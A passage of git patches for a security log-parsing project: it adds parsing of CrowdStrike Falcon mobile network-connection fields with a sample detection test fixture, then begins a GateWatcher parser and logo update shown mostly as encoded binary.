From d277112c70a09797ce463921a1a90e6d6b93a24f Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 30 Aug 2024 10:57:32 +0200
Subject: [PATCH 001/317] Fix: add mobile detection network connections

---
 .../crowdstrike_falcon/_meta/fields.yml       |  5 ++
 .../crowdstrike_falcon/ingest/parser.yml      | 34 ++++++++
 .../mobile_detection_network_connections.json | 86 +++++++++++++++++++
 3 files changed, 125 insertions(+)
 create mode 100644 CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json

diff --git a/CrowdStrike/crowdstrike_falcon/_meta/fields.yml b/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
index 06491b466..799e1982e 100644
--- a/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
+++ b/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
@@ -115,6 +115,11 @@ crowdstrike.ldap_search_query_attack:
   name: crowdstrike.ldap_search_query_attack
   type: keyword
 
+crowdstrike.mobile.network_connections:
+  description: Mobile network connections
+  name: crowdstrike.mobile.network_connections
+  type: array
+
 crowdstrike.object_id:
   description: The identifier of a vertex
   name: crowdstrike.object_id
diff --git a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
index ae0fbf23a..f739a0b70 100644
--- a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
@@ -559,6 +559,40 @@ stages:
 
           file.name: "{{parsed_event.message.event.TargetFilename}}"
 
+      - set:
+          crowdstrike.mobile.network_connections: >
+            {%- set connections = [] -%}
+            {%- for item in parsed_event.message.event.MobileNetworkConnections -%}
+            {%- set connection = {} -%}
+            {%- set timestamp = item.get("AccessTimestamp") | to_rfc3339 -%}
+            {%- set direction = item.get("ConnectionDirection") | int -%}
+            {%- set flags = item.get("ConnectionFlags") | int -%}
+            {%- set context = {"pid":item.get("ContextProcessId")} -%}
+            {%- set is_ipv6 = item.get("IsIPV6") -%}
+            {%- set protocol = item.get("Protocol") | int -%}
+            {%- set url = item.get("Url") -%}
+            {%- set _ = connection.update({"timestamp":timestamp, "direction":direction, "flags":flags, "context":context, "is_ipv6":is_ipv6, "protocol":protocol, "url":url}) -%}
+            {%- if item.get("LocalAddress") not in [None, ""] -%}
+            {%- set source = {"address":item.get("LocalAddress")} -%}
+            {%- if item.get("LocalPort") not in [None, ""] -%}
+            {%- set _ = source.update({"port":item.get("LocalPort")}) -%}
+            {%- endif -%}
+            {%- set _ = connection.update({"source":source}) -%}
+            {%- endif -%}
+            {%- if item.get("RemoteAddress") not in [None, ""] -%}
+            {%- set destination = {"address":item.get("RemoteAddress")} -%}
+            {%- if item.get("RemotePort") not in [None, ""] -%}
+            {%- set _ = destination.update({"port":item.get("RemotePort")}) -%}
+            {%- endif -%}
+            {%- set _ = connection.update({"destination":destination}) -%}
+            {%- endif -%}
+            {%- set _ = connections.append(connection) -%}
+            {%- endfor -%}
+            {{connections}}
+        filter: "{{parsed_event.message.event.get('MobileNetworkConnections') != None}}"
+
+        #"{{parsed_event.message.event.MobileNetworkConnections}}"
+
   xdr_detection_summary_event:
     actions:
       - set:
diff --git a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
new file mode 100644
index 000000000..04c212800
--- /dev/null
+++ b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
@@ -0,0 +1,86 @@
+{
+  "input": {
+    "message": "{\"metadata\":{\"customerIDString\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"offset\":13896542,\"eventType\":\"MobileDetectionSummaryEvent\",\"eventCreationTime\":1722754343000,\"version\":\"1.0\"},\"event\":{\"SensorId\":\"85ae98xxxxxxd9a8f2\",\"MobileDetectionId\":2,\"ComputerName\":\"host\",\"UserName\":\"user.name@test.com\",\"ContextTimeStamp\":1722754273,\"DetectId\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2\",\"DetectName\":\"CkbSensorDetectDomainHighUI\",\"DetectDescription\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\",\"Tactic\":\"Falcon Intel\",\"TacticId\":\"CSTA0008\",\"Technique\":\"Intelligence Indicator - Domain\",\"TechniqueId\":\"CST0023\",\"Objective\":\"Falcon Detection Method\",\"Severity\":70,\"FalconHostLink\":\"https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"MobileNetworkConnections\":[{\"AccessTimestamp\":1722754273,\"Protocol\":\"6\",\"ConnectionFlags\":0,\"LocalAddress\":\"\",\"RemoteAddress\":\"1.2.3.4\",\"RemotePort\":1,\"ConnectionDirection\":0,\"Url\":\"https://crowdstrike.test.com/integration\",\"IsIPV6\":false,\"ContextProcessId\":17793441978049446000}],\"ApplicationName\":\".com.google.chrome.ios\",\"NetworkDetectionType\":\"prevented\",\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"Falcon for Mobile\",\"DataDomains\":\"Endpoint\",\"PatternId\":41124,\"CompositeId\":\"7da61e27e34f4b8394081896af72e2c7:ind:2250689c5d8e43ccad2f5a7b56bced5b:41124|2\",\"Name\":\"CkbSensorDetectDomainHighUI\",\"Description\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\"}}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "CrowdStrike Falcon",
+        "dialect_uuid": "22f2afd2-c858-443d-8e06-7b335e439c29"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"metadata\":{\"customerIDString\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"offset\":13896542,\"eventType\":\"MobileDetectionSummaryEvent\",\"eventCreationTime\":1722754343000,\"version\":\"1.0\"},\"event\":{\"SensorId\":\"85ae98xxxxxxd9a8f2\",\"MobileDetectionId\":2,\"ComputerName\":\"host\",\"UserName\":\"user.name@test.com\",\"ContextTimeStamp\":1722754273,\"DetectId\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2\",\"DetectName\":\"CkbSensorDetectDomainHighUI\",\"DetectDescription\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\",\"Tactic\":\"Falcon Intel\",\"TacticId\":\"CSTA0008\",\"Technique\":\"Intelligence Indicator - Domain\",\"TechniqueId\":\"CST0023\",\"Objective\":\"Falcon Detection Method\",\"Severity\":70,\"FalconHostLink\":\"https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"MobileNetworkConnections\":[{\"AccessTimestamp\":1722754273,\"Protocol\":\"6\",\"ConnectionFlags\":0,\"LocalAddress\":\"\",\"RemoteAddress\":\"1.2.3.4\",\"RemotePort\":1,\"ConnectionDirection\":0,\"Url\":\"https://crowdstrike.test.com/integration\",\"IsIPV6\":false,\"ContextProcessId\":17793441978049446000}],\"ApplicationName\":\".com.google.chrome.ios\",\"NetworkDetectionType\":\"prevented\",\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"Falcon for Mobile\",\"DataDomains\":\"Endpoint\",\"PatternId\":41124,\"CompositeId\":\"7da61e27e34f4b8394081896af72e2c7:ind:2250689c5d8e43ccad2f5a7b56bced5b:41124|2\",\"Name\":\"CkbSensorDetectDomainHighUI\",\"Description\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\"}}",
+    "event": {
+      "action": "prevented",
+      "category": [
+        "intrusion_detection"
+      ],
+      "dataset": [
+        "MobileDetection"
+      ],
+      "kind": "alert",
+      "severity": 70,
+      "type": "info",
+      "url": "https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV"
+    },
+    "@timestamp": "2024-08-04T06:52:23Z",
+    "agent": {
+      "id": "85ae98xxxxxxd9a8f2"
+    },
+    "crowdstrike": {
+      "customer_id": "0123456789ABCDEFGHIJKLMNOPQRSTUV",
+      "detect_description": "A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.",
+      "detect_id": "0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2",
+      "detect_name": "CkbSensorDetectDomainHighUI",
+      "event_objective": "Falcon Detection Method",
+      "event_type": "MobileDetectionSummaryEvent",
+      "mobile": {
+        "network_connections": [
+          {
+            "context": {
+              "pid": 17793441978049446000
+            },
+            "destination": {
+              "address": "1.2.3.4",
+              "port": 1
+            },
+            "direction": 0,
+            "flags": 0,
+            "is_ipv6": false,
+            "protocol": 6,
+            "timestamp": "2024-08-04T06:51:13.000000Z",
+            "url": "https://crowdstrike.test.com/integration"
+          }
+        ]
+      }
+    },
+    "host": {
+      "name": "host"
+    },
+    "network": {
+      "application": ".com.google.chrome.ios"
+    },
+    "observer": {
+      "product": "Falcon for Mobile",
+      "vendor": "CrowdStrike"
+    },
+    "related": {
+      "user": [
+        "user.name@test.com"
+      ]
+    },
+    "threat": {
+      "tactic": {
+        "id": "CSTA0008",
+        "name": "Falcon Intel"
+      },
+      "technique": {
+        "id": "CST0023",
+        "name": "Intelligence Indicator - Domain"
+      }
+    },
+    "user": {
+      "name": "user.name@test.com"
+    }
+  }
+}
\ No newline at end of file

From ae55e2cfefbf20555a81902b7bf1b694706198a0 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Wed, 4 Sep 2024 15:24:48 +0200
Subject: [PATCH 002/317] Legacy parser & logo updated

---
 GateWatcher/aioniq/_meta/logo.png             | Bin 44477 -> 20110 bytes
 .../aioniq/_meta/smart-descriptions.json      | 106 +++----
 GateWatcher/aioniq/ingest/parser.yml          | 298 +++++++++++++-----
 3 files changed, 264 insertions(+), 140 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png
index ff83fbb4fbccfea650a144a9c1a98f96c0d19b9f..0961df25ca068c6ba4a6d563e52897caec9ac8a4 100644
GIT binary patch
literal 20110
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
